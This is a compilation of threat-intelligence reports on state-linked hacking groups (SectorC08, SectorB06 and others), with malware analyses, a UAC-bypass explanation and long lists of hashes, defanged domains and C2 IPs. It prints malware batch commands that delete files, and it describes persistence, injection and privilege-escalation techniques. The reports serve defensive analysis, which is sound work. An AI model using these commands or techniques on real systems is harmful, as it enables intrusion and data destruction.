Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36 OPR/54.0.2952.64
osb Mozilla/5.0 (Windows NT 10.0; Win64; x64) Safari/537.36

Additionally, if a proxy is defined at “HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings” with the registry keys “ProxyServer”, “ProxyUser”, and “ProxyPass”, these values will be used in the wget “http_proxy”, “–proxy-user”, and “–proxy-password” fields in another invocation of wget.

In total we observed six different versions of wget being used by SectorC08 recently, which are what appears to be different variations of GNU Wget 1.11.4 and GNU Wget 1.16.

Stage 3 and 4 – UltraVNC

The file downloaded by wget is actually the stage 3 binary, another 7zSFX archive but this time containing a password protected WinRARSFX archive which uses UltraVNC for remote administration. In fact, using UltraVNC for unauthorized remote administration has been a tactic which SectorC08 has been using for many years.

Summary

SectorC08 is a threat group interested in targeting Ukraine and has been doing so for many years. While their tactics have not changed much even after so long, that only goes to show that they have achieved at least some success in their operations over the years. From a technical standpoint, their custom malware might appear to some as unsophisticated due to the low technical difficulty in creating these malware samples, but in fact due to their creative use of various versions of open source utilities and modifying a lot of static information such as the 7zSFX and WinRARSFX versions used to create their executables and even the icons of every file, they have consistently achieved low detections from security products and are likely to continue to do so.

Indicators of Compromise

Hashes (SHA-256)

26810e37b605df1a444dc9468d79d8ead28e134a9541ee67241eb50924e4236e
a3fbc94375920390db0d53e2dd59e7606042e047e017125904de6965a502b2f0
b6addc4567145df117d14cfbe6edac98676af16ac5a2da77fb9da31734e3a50e
cab1a3ede5f8b222f402896b2acc315568ee35b8bed02b4d9172cbe75a206e4e
3399e9e57052410411bade73176cea11479a46a7adf866b615a6f369f3e8e9d2
374fd24a31894d9090e46f7bd25cfe5192981e4df45ef7a9be128e37a9e11dde
8c6673f5081bf1389bd5adb88453d86900e17aaa4b9887aa7eb1fd02bbe89dca
9034b7fd62f9d655c7bbbee19f33e9d334fe57849ca938f3293cdb41647e0e89
3c464eb893b719c35064a5ed60f9a204e231b3f5e960782893e4a5f1124aff3b
5dae4d7bbff9ebe9f4032c009f233633baa79061efd7a9e3deaf2c0bc18ac742
020c268089ff2590d27349d0ba9e748269e3afa40127f7acb9d44fcc31a0c30f
73eae0ddc00d228c49ee6aa3369603fb153b56264b8092dd175c2fb49646af39
a7cb50745886f2535d7eefde299cdaa2f64df44163c09a779c9f859bc6304d87
958a9876b158c4ef96556535a2822b2a5193259c4a71086c5ed003c8e5109b63
2709dc808c0fbf6d4990466e44b15f9aa2c94569a137dbb83a95fc8e1beefb89
55cdfe068487a8ca2c1bbfe852f27c9f0d1918d6d5182f28456a5af361511ce3
3bbedec42b4fb9ee2624b36ebb9214d41405a399df86a9332e5cc45cf399201c
be41c927eb7445e759027b84a87426643d39f6287320ef085889b8367e311bfd
a800af4fb370c0afb58c4a300e4fcd7f25439d3379bdf82687a1e86848209799
5555a3292bc6b6e7cb61bc8748b21c475b560635d8b0cc9686b319736c1d828e
1fa39419ea9c2e46acc1f84a6513ae05db8b66cf2fad419962c86ec32f63b5af
c298f905949799fd52c162f35bea112bddc9fa2f921a47f346818d95f71a5c2e
9d51ff330c2772458a8597252b9d13af4ff41e277a942a978070cb8280621760
151ddd68312859bb7b13d3486b95f2f48a4cc7eea3d4f4f4ffc643f2fd34eed6
78daa3f1af5489ee9926752a92e024e2ba18587e53463d81676598d5ccdc3b24
abe17d0cefbbfd24a8df1607ff30628960a4bc5baf035c9d07e15628727523d3
cbbd69de64be85fe1a0d63acde5bf735bd424a57c25893036bb2a16fc99cec2c
a8f849d536481d7d8a0fa59a7bcc03dd3387ab4cc14c0342371ae295817f505c
9dbc77844fc3ff3565970cb09d629a710fdec3065b6e4c37b20a889c716c53bf
fc3a1af59e1ff1d1d4fe38976900708e2003d40e065b075e517cd483d440fe57
1c139173ea4b615a09d27070443f6b601d8571d02fd5445cfec2ce690c276da1
09c527ed64ac87b9dfce00e6ed5562d1fc508bfb018eac493cf0c02558c7a840
d55cb155a97c7c8dfea78b54fa6a5b0a8952068a87357fac221fbe6e70d7a1ea
cadb3faa4953c3e9f0f2a5204373b20a2984ee371b9d230717dbfa67e84eb9c4
14212c4cc251bb1876a01b6fbcc68eb7d0f8e754cac66b417aa0589229471f14
31d8d4e95d2d932c3a9cfc8aea15f8fc464290202f8d681f1e63b93cbf057c1a
548b0ef8da5ec586fb47e56c852e4f7b3f3c424ed9deabc91416bdf996885820
cd59b18c84e79c5fcf5a93600e06493d84c9766985ed7cfab3b9478a4c30472e
39629483da85cb8bf8a32e83f54a6a89320fc9e574d657f0636207d1eb669f38
2a1efabb5a1eb219ae9232a28c9e37d176dd98866c93509f11733dd9e8fce97b
449dd5126d51d51b1f0f6bebea52b36c9aa196f2f2cbd6e677013e26bd832ffb
22821897a44e2db6a816f54a21e34aa59234baf2d3ae54d9ecaadd0ceceffa74
d708c90d51efd1a7b6bc5142b6736bd90454d943d9d6e1860cd6395918ff9ad0
14e814c9cb2e0a03055163625b3099706bd92b95141831acb9150cfba1403bfa
9f697822a3d4714d3b0732aead3c0b2ba14c99f183d06b0694c98a5578cc08c4
601d85c0236f8d3a82fecf353adb106fac23f1681ef866783ff6e634538c9ce0
ba2b5092d1fb79698b6f25c4a435632887164672bd355add2c7e7ffce9a45d72
d3ad9b3b0b6cee60c828c847c9ebd9f7cd5e6b6b5ef31b368b16437e48f7204f
80301273fa0189a57514611a17fe79809a5c1eb044000399b7fce9a73379a9b9
6ffee0a44eaf37c8f00e16e18484bebbf4cad32c9b65b7e1329284d92ca0ff5e
6e524e4caa5975f391219dfe5bf03c63e9b248036b264efb7f3f37f4652348b3
ddcb6a9f5cb1789615985314c58d21f43140e3d53b95b92ffe7e097143cc7763
d55cb155a97c7c8dfea78b54fa6a5b0a8952068a87357fac221fbe6e70d7a1ea
80e876d46ddfb5348d9b8ea6fbb907d6c1029da3854dd3366ab4891c4967b305
72bbbee65e033826b95f4e6fdea6ca124f00f007f7fb080c7568a523523c4111
362b3b172c95bd9d0b04bec3878460d379e2a47e90e23ae54e5d7f991a1ea69c
034fed63fc366ff3cf0137caced77a046178926c63faf1a8cd8db9d185d40821
dd1cdb0ecd48dfc9b7d500414bfc8b07b1babcbb7f8a77eb83a369dabfe8bf93
1093b834938d7547181a14832c3caa95211c75af987f01745cd319e2e5144dfd
9d89ac5d55568d4b37e86c52e8adae57cfe643d134858f4f1404c2e1432976df
b74e88a130823bfb3fae18bc8b8c9eb2553598cb215b2559f436aa3f0875dc64


wget utilities (SHA-256)

92CCC276806C98C4A163855ED6532395438435DB433ECF02A04A9295F6703492
F5BDE8107EC70097D786896F4AA16B96B597DBF0936F61C7856D4C686AA69B54
A48AD33695A44DE887BBA8F2F3174FD8FB01A46A19E3EC9078B0118647CCF599
68452CEDF3D911013B416FE13744D59B5BD15044D9DF13178FF117EA0E05C44F
888BA9147BA89B5713AFE031449BE46BB20972F68839BC3546A511109A496197
8B50E3CA06A22D0BE6A71232B320137C776F80AC3F2C81B7440B43854B8A3BF0

Embedded Lure Documents

67FF9031CE8931FCB4E2AE0E72D1D3B8A67EA39257BB7759DCEA925757A85DD8
4A1B730A2AF2A498D452625CB952297630956B2236AE381051E91C53477E9C2D
606C3D0AE26F6D0C17724409FBDB6960FE246FBF63B3564B06507A68BE6D2F31
B511E05100B3A4F3515C5526D2DC3C873F66384225C174C65931744D9E682DC0
F7E74C7FBA99E1F500A37145ADBDE8F62E3811D50E85330EBFE8B13F1C4B90CF
73E3732EB46A05C1D5E4ED57F222B195C4C3AF4A2E5B9F2FBA37762F79BAF222

Domain Names

hxxp://wincreator[.]ddns[.]net
hxxp://bitwork[.]ddns[.]net
hxxp://winrouts[.]ddns[.]net
hxxp://widusk[.]ddns[.]net
hxxp://workusb[.]ddns[.]net
hxxp://torrent-videos[.]ddns[.]net
hxxp://sprs-files[.]ddns[.]net
hxxp://sprs-updates[.]ddns[.]net
hxxp://spread-new[.]ddns[.]net
hxxp://drop-new[.]ddns[.]net
hxxp://telo-spread[.]ddns[.]net
hxxp://dropdrop[.]ddns[.]net
hxxp://bitvers[.]ddns[.]net
hxxp://my-certificates[.]ddns[.]net
hxxp://kristousb[.]ddns[.]net
hxxp://my-work[.]ddns[.]net
hxxp://spr-d2[.]ddns[.]net
hxxp://military-ua[.]ddns[.]net
hxxp://bitlocker[.]ddns[.]net
hxxp://const-gov[.]ddns[.]net
hxxp://tor-file[.]ddns[.]net
hxxp://torrent-vnc[.]ddns[.]net
hxxp://versiya-spread[.]myftp[.]org
hxxp://spread[.]crimea[.]com
hxxp://dropper[.]crimea[.]com
hxxp://torrent-stel[.]space
hxxp://torrent-supd[.]space

IP Addresses

5[.]23[.]55[.]212
80[.]211[.]167[.]231
84[.]78[.]25[.]153
91[.]226[.]81[.]235
94[.]154[.]11[.]23
95[.]142[.]45[.]48
142[.]93[.]110[.]250
185[.]158[.]115[.]137
185[.]158[.]114[.]95
185[.]231[.]154[.]122
185[.]231[.]154[.]154
185[.]231[.]155[.]12
185[.]231[.]155[.]69
185[.]231[.]155[.]209
185[.]248[.]100[.]104
185[.]248[.]100[.]121
185[.]248[.]100[.]142
193[.]19[.]118[.]65
193[.]19[.]118[.]238
195[.]2[.]253[.]218
195[.]62[.]52[.]91
195[.]62[.]52[.]119
195[.]62[.]52[.]160
195[.]62[.]52[.]164
195[.]62[.]53[.]158
195[.]88[.]208[.]26
195[.]88[.]208[.]51
195[.]88[.]208[.]133
195[.]88[.]208[.]157
195[.]88[.]209[.]136

MITRE ATT&CK Techniques

The following is a list of MITRE ATT&CK Techniques we have observed based on our analysis of these malware.

Initial Access

T1091 Replication Through Removable Media
T1193 Spearphishing Attachment

Execution

T1059 Command-Line Interface
T1085 Rundll32
T1053 Scheduled Task
T1064 Scripting
T1204 User Execution
T1047 Windows Management Instrumentation

Persistence

T1158 Hidden Files and Directories
T1060 Registry Run Keys / Startup Folder
T1053 Scheduled Task
T1023 Shortcut Modification

Defense Evasion

T1158 Hidden Files and Directories
T1036 Masquerading
T1085 Rundll32
T1064 Scripting
T1027 Obfuscated Files or Information

Discovery

T1057 Process Discovery
T1012 Query Registry
T1082 System Information Discovery
T1016 System Network Configuration Discovery
T1124 System Time Discovery
T1497 Virtualization/Sandbox Evasion

Command and Control

T1043 Commonly Used Port
T1065 Uncommonly Used Port
T1219 Remote Access Tools
T1071 Standard Application Layer Protocol

Monthly Threat Actor Group Intelligence Report, April 2019

This is a summary of activity of suspected state sponsored Threat Actor Groups analyzed by the ThreatRecon Team, based on data and information collected from March 21 to April 20, 2019.


1. SectorA Activity Features

A total of four hacking groups, SectorA01, SectorA02, SectorA05 and SectorA06 were found among SectorA hacking groups this April.

The scope of activity for SectorA groups found in April is much larger than in the past. Previously, their targets were mainly in East Asia and North America, but now includes many more targets around the world. Traces of hacking activities have been found in the Middle East, including Israel, Turkey and Palestine, East Asia including China and South Korea, Eastern Europe including Ukraine and Slovenia, Southeast Asia including Sri Lanka and Vietnam, and North America including the United States.

The techniques used in their hacking activities found were basically using Spear Phishing techniques with a Hangul Word Process (HWP) file or Microsoft Word file depending on the target person or organization. We also observed them using the recently discovered WinRAR vulnerability. In addition, a case of Watering Hole attack was found.

For targets in East Asia, including South Korea, their aim was stealing information related to politics and diplomacy, as well as at stealing financial information represented by virtual currencies. Elsewhere, they were concerned with military information related to military weapons and stealing diplomatic information from countries engaged in diplomatic activities related to SectorA.

The scope of the hacking activities is expected to continue to expand in the future, as the hacking activities of SectorA hacking groups are being carried out for stealing military, diplomatic, political and financial information purposes.


2. SectorB Activity Features

A total of three hacking groups, SectorB01, SectorB06, and SectorB10 were found among SectorB hacking groups this April.

SectorB hacking groups hacking activities have been found in Europe including Russia, Portugal, Germany and France, and in Asia including Mongolia, Singapore, Japan, Taiwan, Vietnam and South Korea.

SectorB hacking groups had hacked the internal network of hardware and software manufacturers in East Asia, using Microsoft’s RTF file malware as an Spear Phishing attachment, including vulnerabilities that were frequently used in the past.

These Supply Chain Attacks were linked to cases involving malware in an online game update file developed by an online gaming company in East Asia in March.

They are likely to have done so because the difficulty of directly hacking their target organizations or staff was high enough to warrant other attack routes such as using Supply Chain Attacks to gain access to their targets instead.


3. SectorC Activity Features

A total of three hacking groups, SectorC01, SectorC02, and SectorC10 were found among SectorC hacking groups this April, with hacking activity targeted at countries in Europe and North America, including Britain, the United States, and Germany.

This April, SectorC hacking groups aimed at stealing information on political and diplomatic activities in European countries. They basically used Spear Phishing techniques with malware and tried to target the presidential elections in certain Eastern European countries.

In addition, SectorC10 hacking activity targeting ICS/SCADA environments has been discovered, and this group has various capabilities and tools, such as WebShells, Backdoors, and performing Credential Harvesting and Remote Command Execution.


4. SectorD Activity Features

A total of four hacking groups, SectorD01, SectorD02, SectorD05 and SectorD12 were found among SectorD hacking groups this April, with hacking activity targeted at countries in the Middle East, including the Sector’s political competitor Saudi Arabia, the United Arab Emirates, Jordan, Iraq and Turkey, and Ukraine, Estonia, Germany, and the United States, as well as South and East Asia.

SectorD hacking groups are basically using Spear Phishing techniques with malware and example phishing documents were word files using confidential U.S. State Department forms. At the same time, malware in the form of compressed files that abused the recently discovered WinRAR’s vulnerability were also found. SectorD hacking groups mainly collected political, military and diplomatic information from countries in the Middle East that are its political competitors.

However, with the recent declaration of noncompliance with some treaties of a Nuclear Agreement it is part of, hacking aimed at collecting information on government activities are expected to intensify as conflicts are expected with other countries in many areas, including politics and diplomacy.


5. SectorE Activity Features

A total of two hacking groups, SectorE02, and SectorE05 were found among SectorE hacking groups this April, with hacking activity targeted at countries including Pakistan, Bangladesh, Sri Lanka, Myanmar and Nepal.

SectorE hacking groups typically use Spear Phishing as a major hacking technique to attach web page links or Microsoft Excel documents containing VBA macro scripts to emails that mimic legitimate entities such as foreign governments, telecommunications and defense industries, or utilize malicious Microsoft Word files that exploit known code execution vulnerabilities.

The recent spate of military and physical clashes in Pakistan is feared to spread to cyberwarfare. Against this backdrop, the number of hacking activities in neighboring countries is increasing as countries seek to collect information on diplomatic activities related to Central and Southeast Asian countries.


6. SectorF Activity Features

One hacking group, SectorF01, was found among SectorF hacking groups this April, with hacking activity targeted at countries in Southeast Asia including Vietnam, Cambodia, and East Asia including Japan, China, and South Korea.

The SectorF01 Group has previously conducted hacking activities on Southeast Asian countries for its political and military interests, but these days it seems like they are also interested in hacking for economic interests.

Some of these changes in hacking purposes as mentioned earlier have also led to widespread hacking in Southeast Asia and East Asia.

The hacking techniques used by the SectorF01 Group range from watering hole attacks using scripted malicious code that exploits vulnerabilities to Spear phishing hacking techniques where malicious codes exist as attachments.

In addition, they have been using various hacking techniques, scenarios, and strategies to make malware that operates on Mac operating systems in addition to malware that operates on Windows operating systems.


7. Cyber Crime Groups Activity Features

A total of three groups, SectorJ02, SectorJ03 and SectorJ04, were found to be responsible for cybercriminal purposes this April.

The targeted areas where these hacking groups operate for cybercrime have been found in the Middle East including Palestine, the United Arab Emirates and Saudi Arabia, in the Netherlands, Luxembourg, Europe including Sweden, Macedonia, Russia and Italy, in North and South America, South Korea, Japan, Singapore, as well as in Asia and the United States and Mexico.

Those who hack for financial purposes are also found in a wide range of countries, and they have different purposes from those who are supported by a particular country. However, as of December 2018, SectorsJ03 and SectorJ04 groups have moved their hacking activities to countries in Asia.

For the purpose of cyber crime, hacking groups generally use Spear Phishing as their major hacking technique, and the attached malware mainly include macros written to perform malicious functions. In addition, they also attempt to use Windows-based malicious scripts such as PowerShell, VBScript, and BAT.


The full report detailing each event together with IoCs (Indicators of Compromise) and recommendations is available to existing NSHC ThreatRecon customers.

SectorB06 using Mongolian language in lure document

Overview

SectorB06 is a state sponsored threat actor group active especially within Asia. They have been exploiting vulnerabilities in Microsoft Office’s Equation Editor [1] which Microsoft removed in January 2018 [2], which in this case seems to be a highly obfuscated version of CVE-2017-11882. The malware we analyzed in this case are sent seemingly only after they already have a basic foothold in their target organizations.

We came across multiple pieces of their malware used in 2019 which appears to be custom compiled on a per target victim per organization basis, with this particular decoy document being uploaded from a Singapore IP address.

Decoy RTF Document

In this example, SectorB06 made use of a Mongolian decoy document to target their victim.

Decoy document written in Mongolian which references the Ministry of Justice and Internal Affairs of Mongolia

If exploitable, the exploit code drops the first-stage malware DLL at “%APPDATA%\Microsoft\Word\STARTUP\cclerr.wll” and runs it.

First Stage Malware (RasTls.dll)

The malware starts off by resolving a list of encoded API addresses by accessing the address of kernel32 from the InMemoryOrderModuleList inside the Process Environment Block (PEB) using FS:[0x30]. It then gets the address of kernel32.LoadLibraryA and kernel32.GetProcAddress from a function which parses kernel32’s memory block. This is despite the malware already importing LoadLibraryA() and GetProcAddress(), and is used presumably to prevent automated systems from detecting massive amounts of calls to those functions.

From there, it gets the address of the other libraries it makes use of – Shlwapi.dll, Shell32.dll, Gdi32.dll, User32.dll, and Advapi32.dll. Once that is done, it calls the function which parses the various DLLs again close to 100 times in order to resolve all the APIs it uses. In the middle of those calls, it checks CheckRemoteDebuggerPresent and does not resolve the APIs from the other DLLs if a debugger is found, which will cause the malware to exit later before doing anything malicious.

Malware decrypting the imports it uses via its custom hashing algorithm

It then starts a thread which polls the result of CheckRemoteDebuggerPresent constantly and exits once a debugger is found.

Process Name Hashing

The malware checks for the lower-cased process name it is running under at various steps of execution using a string hashing algorithm. In the first step, it checks against the string hash “0xAB341DFA”, “0x190BC0F1”, “0x639EBCBF”, “0xA6AFB610”, “0x4D16CE36”, and “0x64820461”. It only continues execution if the process name hash is one of the first five hashes and the process name hash is not the last hash. We wrote a custom bruteforcing utility and managed to crack the first five hashes, finding the process names which the attacker expected as “winword.exe”, “excel.exe”, “powerpnt.exe”, “acrord32.exe”, and “eqnedt32.exe”. While four of these process names are associated with Microsoft Office and the Equation Editor vulnerabilities, “acrord32.exe” (Adobe Reader) is also in the expected process name list because the malware will in some situations rename the legitimate signed Symantec executable file (described later) to “AcroRd32.exe”.

Malware making sure the process name is related to the exploit source or itself

Besides this initial check, it also checks the hashes of process names at three other points of execution. Only the hash 0X84F39C89 is checked against the entire process list and is not a lower-case version of the process name.

HashMeaningDescription
0X0E867CB6rundll32.exeIf process is rundll32.exe, do not continue
0XA54ACF71explorer.exeIf process is not explorer/services.exe, do not continue
0XCD163D44services.exe If process is not explorer/services.exe, do not continue
0X84F39C89<unknown>If this process exists, do not inject into dllhost.exe

From this we can see there are actually two points from which the malware expects to run from – using the Microsoft Office exploit which injects the second stage malware into dllhost.exe or another path which injects into explorer.exe/services.exe.

Persistence

This first stage malware mainly decompresses and drops two files being used for persistence.

File NameDescription
RasTls.dllRenamed from cclerr.wll
IntelGraphicsController.exe / AcroRd32.exeLegitimate signed Symantec file (real name: dot1xtra.exe) from Symantec Network Access Control agent (version 12.1.671.4971)
Hash: 724909ba378a872018a3ae0b68afe4949bc404de31bcbd65a6239c12b3a7a3ea

Public examples of a different version of this same signed file being abused in the wild was with version 11.0.4010.7, where the filenames used were rastlsc.exe and iassvcs.exe. Though these files were signed, their certificates have long expired.

The files used for persistence are stored in either the “%AppData%\Intel\Intel(R) Processor Graphic\” or “%PROGRAMFILES%\Intel\Intel(R) Processor Graphics\” directories.

The persistence keys used are in <HIVE>\Software\microsoft\windows\currentversion\run where <HIVE> is either HKLM or HKCU depending on whether there is administrative rights. The name of the registry key used is “IntelGraphicsController” with the value of “<DIRECTORY_TO_INTELGRAPHICSCONTROLLER.EXE> Processid:{0A10C245-2190-7215-A3C5-43215926716A}”.

Commands Ran

The malware runs CreateProcess from a custom command execution function four times, with each run executing takeown/icacls/icacls. The first icacls function attempts to give ownership to the administrators group and the second icacls function attempts to give ownership to the users group. The four runs are for the RasTls.dll file in the %APPDATA% and %PROGRAMFILE% subdirectories and the IntelGraphicsController.exe file in the %APPDATA% and %PROGRAMFILE% subdirectories.

Besides those commands, it also drops two batch files.

<random.bat> – deleting from initial location
Ping 127.0.0.1 -n 10 del “C:\Users\admin\AppData\Roaming\Microsoft\Word\STARTUP\cclerr.wll” /q /f del %0 /q /f

<random.bat> – attempting to delete winword.exe
Ping 127.0.0.1 -n 10 del “C:\Program Files\Microsoft Office\Office14\WINWORD.EXE” /q /f del %0 /q /f

Timestomping

The malware uses kernel32’s GetFileTime() and SetFileTime() to get the Creation Time, Last Access Time, and Last Write Time of %windir%\system32\kernel32.dll and saves those same times to the RasTls.dll and IntelGraphicsController.exe files. However, these timestamps are only approximate [3] so the fake times will not be an exact match to kernel32.dll’s file time.

The main two files dropped by the malware for persistence have the approximate timestamps of kernel32.dll

Victim Identification

The malware identifies its victims using <HIVE>\Software\Intel\Java (with <HIVE> being HKLM/HKCU again) with the name “user”. Malware “1-a” referenced below is the current first stage malware we are describing in this post.

Malware “1-a” and “5-a” contain the same victim identifier values, as do “2-a” and “3-a”. This is interesting because of the second stage malware which we describe briefly later.

Malware  Victim Identification Value
1-a 0XdgrHGaayfyBHQ/vCwMP2HE+cNEbzTk
6cZ9bYJOH0R2/z9riKtfcWki36ENBhJ/
2-aW3qNGgEnxwHShISsHqe4WQlLvmX2q0ms
tlCuJVt0/qjwLh7CWXM34rJI66fTyf1u
3-a4et2q+jmcCeVoPVtVlUeC+Zqq62VN3Q7e7noo8oplXCIv
aA22rc7KIYWtv69Nv1rgPeytor20Dv5..oEFQze78uA==
5-a0XdgrHGaayfyBHQ/vCwMP2HE+cNEbzTk
6cZ9bYJOH0SxvpFWecTmuneM/5p93lQw

Process Injection

Finally, the malware performs process injection into “%windir%\system32\dllhost.exe /Processid:{712459B2-3311-54C3-910D-0327080553246}” without the second stage ever touching the disk. The injected process, dllhost.exe, is typically a container process for running COM DLLs. The list of CLSIDs in a system can be seen in KEY_CLASSES_ROOT\CLSID. We are unsure what the hardcoded CLSID value of “712459B2-3311-54C3-910D-0327080553246” is supposed to represent, but a likely guess is a CLSID used by Symantec since the malware is impersonating their executable file.

Second Stage Malware

While we did not analyze the second stage malware in large detail, we did decode the C2 information among other data such as credentials. The samples we analyzed appear to connect to two external C2 IP addresses 217[.]69[.]8[.]255 and 1[.]187[.]1[.]187 on port 443. It also references an internal IP address, which indicate that these spear phishing documents are sent to targeted victims and only after the attacker already has basic access to the victim’s internal network.

One of the purposes of this second stage malware also appears to be for creating a remote command shell.

MalwareInternal IPs Referenced
1-b192[.]168[.]43[.]234
2-b192[.]168[.]111[.]111
3-b192[.]168[.]111[.]111
4-b192[.]168[.]43[.]234
5-b192[.]168[.]43[.]234
6-b192[.]168[.]43[.]234

With the malware trying to target/use the same internal IP but with different user identification values, we see how the attacker is custom compiling each malware executable for each victim/attempt in a specific organization.

Summary

SectorB06 is a threat group with very specific interests and in the case of these malware, appears to either already have a basic foothold in the victim network or has already gained and then lost access to the network. They are actively developing their toolkit and are adept at bypassing security solutions at least statically especially for their exploit document and second stage malware.

Indicators of Compromise

Decoy Hash (SHA-256)

803c25767414c31259e15f058d62b6102dfe09d3cfacece57f527d7fb2a50632

First Stage Hashes (SHA-256)

304115cef6cc7b81f4409178cd0bcea2b22fd68ca18dfd5432c623cbbb507154
6086b407ed69434fce117bc173f70a2ec147fdf119cf38f6031c1889e19ff8bf
240f2c0cd808991b2c77a978203c661612e250df2b0bad9fd452b6c21d60b324
d0ccb9a277b986f7127199f122023c79a7e0253378a4a78806fbf55a87633532

Second Stage Hashes (SHA-256)

87c4eb8201f9cf92aa5562d112fdd322a01899bcc38ba39e4f6ef92cbf144900
fcb0d071a9384750adf88963eb580690effbe8b29942afa6a8e2566e9a4e94dd
e8446ba200c9d703fab7ddc068b45772585ae782a8bcf4c5f86782d7220405f7
32fbd62a1fde794cdf95a67f22f47b495474cd18419ac4c37fbb5460cdfd1831
85bdd517886e645a3d0e4e4bc16ede5bbb126eaf86c0d14c05a951219f48555a

IP Addresses

217[.]69[.]8[.]255
1[.]187[.]1[.]187

MITRE ATT&CK Techniques

The following is a list of MITRE ATT&CK Techniques we have observed based on our analysis of these malware.

Initial Access

T1193 Spearphishing Attachment

Execution

T1059 Command-Line Interface
T1203 Exploitation for Client Execution
T1064 Scripting
T1204 User Execution
T1218 Signed Binary Proxy Execution

Persistence

T1038 DLL Search Order Hijacking
T1060 Registry Run Keys / Startup Folder

Defense Evasion

T1116 Code Signing
T1038 DLL Search Order Hijacking
T1107 File Deletion
T1055 Process Injection
T1218 Signed Binary Proxy Execution
T1045 Software Packing
T1099 Timestomp

Discovery

T1057 Process Discovery
T1012 Query Registry
T1063 Security Software Discovery
T1124 System Time Discovery

Collection

T1119 Automated Collection

Exfiltration

T1022 Data Encrypted

Command and Control

T1043 Commonly Used Port
T1071 Standard Application Layer Protocol

References

[1] Microsoft Office : List of security vulnerabilities
https://www.cvedetails.com/vulnerability-list/vendor_id-26/product_id-320/cvssscoremin-9/cvssscoremax-/Microsoft-Office.html
[2] CVE-2018-0802 | Microsoft Office Memory Corruption Vulnerability
https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2018-0802
[3] GetFileTime function
https://docs.microsoft.com/en-us/windows/desktop/api/fileapi/nf-fileapi-getfiletime

Threat Actor Group using UAC Bypass Module to run BAT File

Overview

Our Threat Recon team continues to collect and analyze activity-related data from multiple APT groups. We analyzed malware used in hacking activities targeting organizations located in South Korea, the US, and East Asia earlier this year. They use a CAB file that compresses the malware, separate configuration files and a specific User Access Control (UAC) bypass module. This article briefly describes the infection method of the malware that they were using at the time and the UAC bypass module used.

Infection Method

The attackers used quite a few steps to generate their malware, and the initial infection comes from malicious documents attached to spear phishing emails. When a user executes a file attached to the email, a batch file for downloading a base64-encoded CAB file from a remote site is downloaded through a script included in the document.

Infection method using CAB file

The following is the sequence of the infection method that they use.

  1. Download base64 encoded data 1.txt via script embedded in malicious documents
  2. Decode “1.txt” to create “1.bat” and run “1.bat”
  3. “1.bat” downloads 2.txt (32-bit) or 3.txt (64-bit) according to the Windows platform environment (32bit / 64bit)
  4. Decode “2.txt” or “3.txt” to create “setup.cab”

Each file looks like an SSL certificate using the string “—– BEGIN CERTIFICATE —–“, but this is actually a base64 encoded cab and bat file.

Left: The 1.bat file used to decompress the CAB file and run the main payload
Right: The 2.txt CAB file for 32-bit Windows systems

The CAB file is created according to the Windows platform environment through the following files:

  1. BAT file for main payload file execution
  2. INI file containing attacker server address
  3. DLL file for UAC bypass
  4. Main EXE payload

Why does UAC Run?

This malware’s first batch file (1.bat) executes a second batch file which installs the main payload. A UAC pop-up will normally be shown to the user and this is caused by the code in the BAT file that installs the main payload. It copies the INI configuration file and the main payload EXE into the System32 folder.

In general, when files are copied to the System32 folder, a UAC pop-up will run for security reasons. This folder should not be modified in normal situations because it contains important files used to operate the system.

Why UAC runs

BAT File Details

The first batch file (1.bat) downloads the file from a remote server and uses the “net session> nul” command to verify the current user rights and perform the following actions:

  • If admin : Delete UAC bypass DLL, execute main payload and BAT file
  • If not admin : Execute the following command using rundll32.exe
    Command : “[UAC Bypass Module], EntryPoint [Main Payload execution BAT file]”.
Batch Code

The batch file used to install the main payload copies the main payload executable and INI configuration files into the System32 folder, and then runs the main payload which was moved to the System32 folder.

BAT file running Main Payload Code

About UAC

User Account Control (UAC) is a Windows operating system security control function based on the concept of access tokens. It displays a screen informing the user when a program requires administrator level privileges, acting as a warning prompt for user consent of unknown privileged activity.

UAC popped up on screen

How it works

When a user logs into Windows, each user is given an access token. This access token has information on the security identifier (SID), the Windows operating system privilege, and the access level granted to the user, and the Windows system uses the access token to verify the user’s privilege. The access tokens generated at login are:

  • standard user : Generates a standard user access token
  • administrator : Generate standard user access token, administrator access token

The system allocates the following integrity levels according to the token privileges of the logged-in user. System performs access control by comparing the access rights of the security descriptor of the object with the user’s SID.

Processes that run at Medium Level

Issued tokens are used for events such as process creation. The important thing here is that when a process is created after issuing a token, the administrator also executes the new process using the standard user access token.

Generally, explorer.exe which is the parent process of most user processes operates at medium integrity level, so most processes run at the same level to explorer.exe. But when a process requires a high integrity level, processes can obtain an elevated privilege if the user approves it.

This basically means that a process typically uses a standard user access token and uses the UAC to get the user’s authorization if an administrator access token is needed.

The following such actions are examples of events which trigger UAC:

Running an Application as an Administrator
Changes to system-wide settings
Changes to files in folders that standard users don’t have permissions for (such as %SystemRoot% or %ProgramFiles% in most cases)
Changes to an access control list (ACL), commonly referred to as file or folder permissions
Installing device drivers
Installing ActiveX controls
Changing settings for Windows Firewall
Changing UAC settings
Configuring Windows Update
Adding or removing user accounts
Changing a user’s account type
Turning on Guest account (Windows 7 and 8.1)
Turning on file sharing or media streaming
Configuring Parental Controls

UAC Bypass Module

However, the attackers in this case use a particular DLL module for bypassing UAC. It seems to have been created by referring to the source code of a file named UAC-TokenMagic.ps1 which is open source on GitHub.

First, it creates a wusa.exe process (an auto-elevatable process) that runs at a High Integrity Level. This process is the Windows Update Standalone installer, and it has an auto-elevate attribute so it does not pop up UAC if the system UAC popup setting is “Notify me only when programs / apps try to make changes to my computer”.

After creating wusa.exe, it copies that token and run the cmd.exe process via CreateProcessWithLogonW using the copied token. Finally, cmd.exe runs at a High Integrity Level and executes “/c EntryPoint” %Temp%\[bat file install main payload]” and this batch file inherits the elevated privilege of cmd.exe.

Part of the UAC Bypass module code

If the attacker is using the UAC bypass module, the batch file that runs the main payload will work through the cmd.exe generated by copying the access token from wusa.exe. In conclusion, the UAC will not pop up even if the code that moves the file into the System32 folder in batch file is executed.

Summary

The attackers compress the UAC Bypass Module with other components and distributes them in a CAB file format. We have seen this threat actor group mainly use decoy documents written in Russian, English and Korean and used the BABYFACE, SYSCON malware variants as the main payload. Such activity may be related in part to the activities of the previously known threat actor groups. Our Threat Recon team will continue to monitor these Cyber Threat.

Indicators of Compromise

Hashes(SHA-256)

2b94c694a6279eaa08ce4a17fb848c8431c14beb9f811f1b2732b778c1703fbf
1df5cd85693dc2ce2ba5f7f251785b00b542d93f8e067539cadb550aa673759d
